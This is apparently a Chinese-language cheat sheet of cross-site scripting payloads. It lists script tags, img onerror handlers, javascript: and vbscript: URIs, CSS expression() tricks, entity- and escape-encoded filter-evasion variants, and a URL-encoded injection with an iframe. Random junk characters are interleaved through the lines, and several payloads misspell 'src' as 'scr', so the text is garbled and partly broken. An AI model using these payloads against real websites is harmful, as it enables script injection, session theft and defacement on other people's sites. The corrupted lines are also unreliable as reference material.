<script>alert("跨站")</script> (最常用)
3 V q/ _! T# c- o+ g<img scr=javascript:alert("跨站")></img>7 F$ v5 N- d2 E* I4 G. ]
<img scr="javascript: alert(/跨站/)></img> O' k, t* o) y% b! {& X
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
7 @5 n& e, w g/ b1 S- ~- |- C- @<img scr="#" onerror=alert(/跨站/)></img>! {* q- K0 ?, X3 J1 S8 l
<img scr="#" style="xss:expression(alert(/xss/));"></img>' N6 ]; o5 A/ t
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)1 f+ J% q1 s5 h
<img src=vbscript:msgbox ("xss")></img>* n1 G! l6 }- v
<style> input {left:expression (alert('xss'))}</style>
5 A+ O4 w% Q& c7 y- Z+ h<div style={left:expression (alert('xss'))}></div>5 [' w9 @/ f3 P( e- Z7 g, c4 R, ?( \. ?
<div style={left:exp/* */ression (alert('xss'))}></div>
% R) Q# R+ Q1 }2 \ }<div style={left:\0065\0078ression (alert('xss'))}></div>/ ]: F) f, Y; X
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
8 w1 F6 k3 \" Bunicode <div style="{left:expRessioN (alert('xss'))}">. V3 r( h2 }+ h& a( J
2 C' Y1 N# w! Y: }
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
, i/ ~2 Q1 |$ l+ `; @0 R; ` |